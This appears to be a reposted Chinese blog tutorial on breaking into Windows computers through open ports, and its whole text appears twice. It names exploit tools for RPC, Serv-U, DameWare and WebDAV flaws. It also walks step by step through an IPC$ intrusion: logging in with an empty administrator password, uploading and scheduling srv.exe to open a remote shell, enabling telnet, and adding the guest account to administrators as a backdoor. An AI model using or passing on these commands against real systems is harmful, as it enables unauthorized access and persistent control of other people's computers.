139端口***
135端口主要用于使用RPC(Remote Procedure Call,遠(yuǎn)程過程調(diào)用)協(xié)議并提供DCOM(分布式組件對(duì)象模型)服務(wù),通過RPC可以保證在一臺(tái)計(jì)算機(jī)上運(yùn)行的程序可以順利地執(zhí)行遠(yuǎn)程計(jì)算機(jī)上的代碼;使用DCOM可以通過網(wǎng)絡(luò)直接進(jìn)行通信,能夠跨包括HTTP協(xié)議在內(nèi)的多種網(wǎng)絡(luò)傳輸。
端口漏洞:相信去年很多Windows 2000和Windows XP用戶都中了“沖擊波”病毒,該病毒就是利用RPC漏洞來***計(jì)算機(jī)的。RPC本身在處理通過TCP/IP的消息交換部分有一個(gè)漏洞,該漏洞是由于錯(cuò)誤地處理格式不正確的消息造成的。該漏洞會(huì)影響到RPC與DCOM之間的一個(gè)接口,該接口偵聽的端口就是135。
1:用139端口***
我們先確定一臺(tái)存在139端口漏洞的主機(jī)。用掃描工具掃描!比如SUPERSCAN這個(gè)端口掃描工具。假設(shè)現(xiàn)在我們已經(jīng)得到一臺(tái)存在139端口漏洞的主機(jī),我們要使用nbtstat -a IP這個(gè)命令得到用戶的情況!現(xiàn)在我們要做的是與對(duì)方計(jì)算機(jī)進(jìn)行共享資源的連接。
用到兩個(gè)NET命令,下面就是這兩個(gè)命令的使用方法
NET VIEW?
作 用:顯示域列表、計(jì)算機(jī)列表或指定計(jì)算機(jī)的共享資源列表。?
命令格式:net view [\\computername | /domain[:domainname]]?
參數(shù)介紹:?
<1>鍵入不帶參數(shù)的net view顯示當(dāng)前域的計(jì)算機(jī)列表。?
<2>\\computername 指定要查看其共享資源的計(jì)算機(jī)。?
<3>/domain[:domainname]指定要查看其可用計(jì)算機(jī)的域?
NET USE?
作用:連接計(jì)算機(jī)或斷開計(jì)算機(jī)與共享資源的連接,或顯示計(jì)算機(jī)的連接信息。?
命令格式:net use [devicename | *] [\\computername\sharename[\volume]]?
[password | *]] [/user:[domainname\]username] [[/delete] |?
[/persistent:{yes | no}]]?
參數(shù)介紹:?
鍵入不帶參數(shù)的net use列出網(wǎng)絡(luò)連接。?
devicename指定要連接到的資源名稱或要斷開的設(shè)備名稱。?
\\computername\sharename服務(wù)器及共享資源的名稱。?
password訪問共享資源的密碼。?
*提示鍵入密碼。 /user指定進(jìn)行連接的另外一個(gè)用戶。?
domainname指定另一個(gè)域。?
username指定登錄的用戶名。?
/home將用戶連接到其宿主目錄?
/delete取消指定網(wǎng)絡(luò)連接。?
/persistent控制永久網(wǎng)絡(luò)連接的使用。?
C:\net use \\IP
C:\net view \\IP
我們已經(jīng)看到對(duì)方共享了他的C,D,E三個(gè)盤
我們要做的是使用NBTSTAT命令載入NBT快取.
c:\>nbtstat –R 載入NBT快取
c:\>nbtstat –c 看有無載入NBT快取
現(xiàn)在我們已經(jīng)得到的139端口漏洞的主機(jī)IP地址和用戶名,現(xiàn)在就該是我們進(jìn)入他計(jì)算的時(shí)候了,點(diǎn)擊開始---查找--計(jì)算機(jī),將剛才找到的主機(jī)名字輸入到上面,選擇查找,就可以找到這臺(tái)電腦了!雙擊就可以進(jìn)入,其使用的方法和網(wǎng)上領(lǐng)居的一樣。
2:4899端口***
用4899過濾器.exe,掃描空口令的機(jī)器
3:80***
對(duì)sp3以前的機(jī)器,可以用webdav***;
對(duì)bbs論壇,可以試試上傳漏洞(upfile.exe或dvup_delphi.exe)
可以利用SQL進(jìn)行注入。(啊D的注入軟件)。
4:serv-u***(21端口)
對(duì)5. 004及以下系統(tǒng),可用溢出***。(serv5004.exe)
對(duì)5.1.0.0及以下系統(tǒng),可用本地提升權(quán)限。(servlocal.exe)
對(duì)serv-u的MD5加密密碼,可以用字典暴破。(crack.vbs)
輸入一個(gè)被serv-u加密的密碼(34位長(zhǎng)),通過與字典檔(dict.txt)的比較,得到密碼
5: 554端口
用real554.exe***。
6:6129端口
用DameWare6129.exe***。
7. 6129端口
用DameWare6129.exe***。
8. 系統(tǒng)漏洞
利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,
進(jìn)行溢出***。
9. 3127等端口
可以利用doom病毒開的端口,用nodoom.exe***。(可用mydoomscan.exe查)。
10. 其他***
利用shanlu的***軟件***(WINNTAutoAttack.exe)。
經(jīng)典IPC$***
1. C:\>net use \\127.0.0.1\IPC$ "" /user:"admintitrators"
這是用"流光"掃到的用戶名是administrators,密碼為"空"的IP地址(氣好到家如果是打算***的話,就可以用這樣的命令來與127.0.0.1建立一個(gè)連
接,因?yàn)槊艽a為"空",所以第一個(gè)引號(hào)處就不用輸入,后面一個(gè)雙引號(hào)里的是用戶名
,輸入administrators,命令即可成功完成。
2. C:\>copy srv.exe \\127.0.0.1\admin$
先復(fù)制srv.exe上去,在流光的Tools目錄下就有(這里的$是指admin用戶的
c:\winnt\system32\,大家還可以使用c$、d$,意思是C盤與D盤,這看你要復(fù)制到什么地方去了)。
3. C:\>net time \\127.0.0.1
查查時(shí)間,發(fā)現(xiàn)127.0.0.1 的當(dāng)前時(shí)間是 2002/3/19 上午 11:00,命令成功完成。
4. C:\>at \\127.0.0.1 11:05 srv.exe
用at命令啟動(dòng)srv.exe吧(這里設(shè)置的時(shí)間要比主機(jī)時(shí)間快,不然你怎么啟動(dòng)啊.
5. C:\>net time \\127.0.0.1
再查查到時(shí)間沒有?如果127.0.0.1 的當(dāng)前時(shí)間是 2002/3/19 上午 11:05,那就準(zhǔn)備
開始下面的命令。
6. C:\>telnet 127.0.0.1 99
這里會(huì)用到Telnet命令吧,注意端口是99。Telnet默認(rèn)的是23端口,但是我們使用的
是SRV在對(duì)方計(jì)算機(jī)中為我們建立一個(gè)99端口的Shell。
雖然我們可以Telnet上去了,但是SRV是一次性的,下次登錄還要再激活!所以我們打
算建立一個(gè)Telnet服務(wù)!這就要用到ntlm了
7.C:\>copy ntlm.exe \\127.0.0.1\admin$
用Copy命令把ntlm.exe上傳到主機(jī)上(ntlm.exe也是在《流光》的Tools目錄中)。
8. C:\WINNT\system32>ntlm
輸入ntlm啟動(dòng)(這里的C:\WINNT\system32>指的是對(duì)方計(jì)算機(jī),運(yùn)行ntlm其實(shí)是讓這
個(gè)程序在對(duì)方計(jì)算機(jī)上運(yùn)行)。當(dāng)出現(xiàn)"DONE"的時(shí)候,就說明已經(jīng)啟動(dòng)正常。然后使
用"net start telnet"來開啟Telnet服務(wù)!
9. Telnet 127.0.0.1,接著輸入用戶名與密碼就進(jìn)入對(duì)方了,操作就像在DOS上操作
一樣簡(jiǎn)單!(然后你想做什么?想做什么就做什么吧,哈哈)
為了以防萬一,我們?cè)侔裧uest激活加到管理組
10. C:\>net user guest /active:yes
將對(duì)方的Guest用戶激活
11. C:\>net user guest 1234
將Guest的密碼改為1234,或者你要設(shè)定的密碼
12. C:\>net localgroup administrators guest /add
將Guest變?yōu)锳dministrator^_^(如果管理員密碼更改,guest帳號(hào)沒改變的話,下次我
們可以用guest再次訪問這臺(tái)計(jì)算機(jī))
端口漏洞:相信去年很多Windows 2000和Windows XP用戶都中了“沖擊波”病毒,該病毒就是利用RPC漏洞來***計(jì)算機(jī)的。RPC本身在處理通過TCP/IP的消息交換部分有一個(gè)漏洞,該漏洞是由于錯(cuò)誤地處理格式不正確的消息造成的。該漏洞會(huì)影響到RPC與DCOM之間的一個(gè)接口,該接口偵聽的端口就是135。
1:用139端口***
我們先確定一臺(tái)存在139端口漏洞的主機(jī)。用掃描工具掃描!比如SUPERSCAN這個(gè)端口掃描工具。假設(shè)現(xiàn)在我們已經(jīng)得到一臺(tái)存在139端口漏洞的主機(jī),我們要使用nbtstat -a IP這個(gè)命令得到用戶的情況!現(xiàn)在我們要做的是與對(duì)方計(jì)算機(jī)進(jìn)行共享資源的連接。
用到兩個(gè)NET命令,下面就是這兩個(gè)命令的使用方法
NET VIEW?
作 用:顯示域列表、計(jì)算機(jī)列表或指定計(jì)算機(jī)的共享資源列表。?
命令格式:net view [\\computername | /domain[:domainname]]?
參數(shù)介紹:?
<1>鍵入不帶參數(shù)的net view顯示當(dāng)前域的計(jì)算機(jī)列表。?
<2>\\computername 指定要查看其共享資源的計(jì)算機(jī)。?
<3>/domain[:domainname]指定要查看其可用計(jì)算機(jī)的域?
NET USE?
作用:連接計(jì)算機(jī)或斷開計(jì)算機(jī)與共享資源的連接,或顯示計(jì)算機(jī)的連接信息。?
命令格式:net use [devicename | *] [\\computername\sharename[\volume]]?
[password | *]] [/user:[domainname\]username] [[/delete] |?
[/persistent:{yes | no}]]?
參數(shù)介紹:?
鍵入不帶參數(shù)的net use列出網(wǎng)絡(luò)連接。?
devicename指定要連接到的資源名稱或要斷開的設(shè)備名稱。?
\\computername\sharename服務(wù)器及共享資源的名稱。?
password訪問共享資源的密碼。?
*提示鍵入密碼。 /user指定進(jìn)行連接的另外一個(gè)用戶。?
domainname指定另一個(gè)域。?
username指定登錄的用戶名。?
/home將用戶連接到其宿主目錄?
/delete取消指定網(wǎng)絡(luò)連接。?
/persistent控制永久網(wǎng)絡(luò)連接的使用。?
C:\net use \\IP
C:\net view \\IP
我們已經(jīng)看到對(duì)方共享了他的C,D,E三個(gè)盤
我們要做的是使用NBTSTAT命令載入NBT快取.
c:\>nbtstat –R 載入NBT快取
c:\>nbtstat –c 看有無載入NBT快取
現(xiàn)在我們已經(jīng)得到的139端口漏洞的主機(jī)IP地址和用戶名,現(xiàn)在就該是我們進(jìn)入他計(jì)算的時(shí)候了,點(diǎn)擊開始---查找--計(jì)算機(jī),將剛才找到的主機(jī)名字輸入到上面,選擇查找,就可以找到這臺(tái)電腦了!雙擊就可以進(jìn)入,其使用的方法和網(wǎng)上領(lǐng)居的一樣。
2:4899端口***
用4899過濾器.exe,掃描空口令的機(jī)器
3:80***
對(duì)sp3以前的機(jī)器,可以用webdav***;
對(duì)bbs論壇,可以試試上傳漏洞(upfile.exe或dvup_delphi.exe)
可以利用SQL進(jìn)行注入。(啊D的注入軟件)。
4:serv-u***(21端口)
對(duì)5. 004及以下系統(tǒng),可用溢出***。(serv5004.exe)
對(duì)5.1.0.0及以下系統(tǒng),可用本地提升權(quán)限。(servlocal.exe)
對(duì)serv-u的MD5加密密碼,可以用字典暴破。(crack.vbs)
輸入一個(gè)被serv-u加密的密碼(34位長(zhǎng)),通過與字典檔(dict.txt)的比較,得到密碼
5: 554端口
用real554.exe***。
6:6129端口
用DameWare6129.exe***。
7. 6129端口
用DameWare6129.exe***。
8. 系統(tǒng)漏洞
利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,
進(jìn)行溢出***。
9. 3127等端口
可以利用doom病毒開的端口,用nodoom.exe***。(可用mydoomscan.exe查)。
10. 其他***
利用shanlu的***軟件***(WINNTAutoAttack.exe)。
經(jīng)典IPC$***
1. C:\>net use \\127.0.0.1\IPC$ "" /user:"admintitrators"
這是用"流光"掃到的用戶名是administrators,密碼為"空"的IP地址(氣好到家如果是打算***的話,就可以用這樣的命令來與127.0.0.1建立一個(gè)連
接,因?yàn)槊艽a為"空",所以第一個(gè)引號(hào)處就不用輸入,后面一個(gè)雙引號(hào)里的是用戶名
,輸入administrators,命令即可成功完成。
2. C:\>copy srv.exe \\127.0.0.1\admin$
先復(fù)制srv.exe上去,在流光的Tools目錄下就有(這里的$是指admin用戶的
c:\winnt\system32\,大家還可以使用c$、d$,意思是C盤與D盤,這看你要復(fù)制到什么地方去了)。
3. C:\>net time \\127.0.0.1
查查時(shí)間,發(fā)現(xiàn)127.0.0.1 的當(dāng)前時(shí)間是 2002/3/19 上午 11:00,命令成功完成。
4. C:\>at \\127.0.0.1 11:05 srv.exe
用at命令啟動(dòng)srv.exe吧(這里設(shè)置的時(shí)間要比主機(jī)時(shí)間快,不然你怎么啟動(dòng)啊.
5. C:\>net time \\127.0.0.1
再查查到時(shí)間沒有?如果127.0.0.1 的當(dāng)前時(shí)間是 2002/3/19 上午 11:05,那就準(zhǔn)備
開始下面的命令。
6. C:\>telnet 127.0.0.1 99
這里會(huì)用到Telnet命令吧,注意端口是99。Telnet默認(rèn)的是23端口,但是我們使用的
是SRV在對(duì)方計(jì)算機(jī)中為我們建立一個(gè)99端口的Shell。
雖然我們可以Telnet上去了,但是SRV是一次性的,下次登錄還要再激活!所以我們打
算建立一個(gè)Telnet服務(wù)!這就要用到ntlm了
7.C:\>copy ntlm.exe \\127.0.0.1\admin$
用Copy命令把ntlm.exe上傳到主機(jī)上(ntlm.exe也是在《流光》的Tools目錄中)。
8. C:\WINNT\system32>ntlm
輸入ntlm啟動(dòng)(這里的C:\WINNT\system32>指的是對(duì)方計(jì)算機(jī),運(yùn)行ntlm其實(shí)是讓這
個(gè)程序在對(duì)方計(jì)算機(jī)上運(yùn)行)。當(dāng)出現(xiàn)"DONE"的時(shí)候,就說明已經(jīng)啟動(dòng)正常。然后使
用"net start telnet"來開啟Telnet服務(wù)!
9. Telnet 127.0.0.1,接著輸入用戶名與密碼就進(jìn)入對(duì)方了,操作就像在DOS上操作
一樣簡(jiǎn)單!(然后你想做什么?想做什么就做什么吧,哈哈)
為了以防萬一,我們?cè)侔裧uest激活加到管理組
10. C:\>net user guest /active:yes
將對(duì)方的Guest用戶激活
11. C:\>net user guest 1234
將Guest的密碼改為1234,或者你要設(shè)定的密碼
12. C:\>net localgroup administrators guest /add
將Guest變?yōu)锳dministrator^_^(如果管理員密碼更改,guest帳號(hào)沒改變的話,下次我
們可以用guest再次訪問這臺(tái)計(jì)算機(jī))
轉(zhuǎn)載于:https://blog.51cto.com/mynba/24674
總結(jié)
- 上一篇: 特斯拉CEO马斯克2020年总薪酬为零
- 下一篇: 一个美国老工程师的心理话: 给年轻工程师